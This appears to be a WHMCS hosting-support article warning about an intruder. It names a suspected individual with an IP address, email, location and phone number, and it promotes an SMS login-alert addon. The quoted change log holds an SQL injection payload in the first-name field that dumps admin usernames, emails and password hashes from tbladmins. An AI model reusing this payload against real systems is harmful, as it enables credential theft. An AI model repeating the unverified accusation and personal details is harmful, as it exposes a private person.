WHMCS HACKER CAUGHT USING EXPLOITS

Known information about a hacker going around Hacking into WHMCS Systems. 
Going by the name of Nguyen Long
Logged IP Address of :- 113.166.57.219
City : Thua Thien Hue , Country Vietnam
Email --kandyug@gmail.com HE USES THIS TO GET THE LOGIN EXPLOIT SO I AM PRETTY SURE HE USES IT A LOT...

We were made aware of the hacking attempt by SMS due to the lucky fact we have the WHMCS SMS NOW Addon which swe have set to alert us of all logins which are not from our whitelisted IP addresses. Not that it happens often, but once in 8 years is bad enough. And it worked well this time. It sends an SMS to pre determined phone numbers when a login from a non whitelist IP occurs. And has many other usefull functions .

 After he hacks in and does he's thing he leaves a little trail.

First Name: 'Nguyen' to 'AES_ENCRYPT(1,1), firstname= (SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)'
Last Name: 'Long' to '1'
Company Name: '' to '1'
Address 1: '10 am mat' to '1'
Address 2: 'Hue' to '1'
City: 'Thua Thien Hue' to '1'
State: '??ng Nai' to '1'
Postcode: '47000' to '1'
Country: 'VN' to 'US'
Phone Number: '841627118435' to '1'
Default Payment Method: '' to ''

NEWSLETTER: 'on' to ''
SMS NOTIFICATIONS: 'on' to ''
MOBILE PHONE NUMBER: '841627118435' to ''

  • 3 Users Found This Useful
Was this answer helpful?

Related Articles

TERMS OF SERVICE

 Terms of Service on Checkout Page This simple template addition replaces the Terms of...

WHMCS FREE ADDONS

http://whmcsaddon.comFREE LIVE CHAT FREE TWO FACTOR AUTHENTICATION 

WHMCS TICKET EXPLOIT

Please familiarise yourself and beware of these things. Rogue tickets in your system may be a...

WHMCS OATH / TWO FACTOR AUTHENTICATION

https://bitbucket.org/Doctor_McKay/whmcs-oath-addon/src/tip/README.mdDOWNLOAD HERE...

Petition to WHMCS reblogged

Thread: Petition to WHMCS - Please rewrite using good code! Thread Tools...